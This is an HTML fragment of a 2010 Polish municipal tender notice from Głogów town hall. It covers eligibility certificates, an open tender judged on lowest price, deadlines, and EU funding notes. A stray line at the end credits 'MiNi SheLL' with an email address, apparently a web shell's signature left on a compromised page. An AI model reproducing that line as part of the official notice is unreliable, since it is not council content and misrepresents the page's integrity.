<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Głogów, Rynek 10
67-200 Głogów, pok. 314, III piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.06.2010 godzina 10:00, miejsce: Urząd Miejski Głogów, Rynek 10
67-200 Głogów, pok. 125, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie planowane jest do refinansowania ze środków pochodzących z budżetu Unii Europejskiej lub innych krajowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com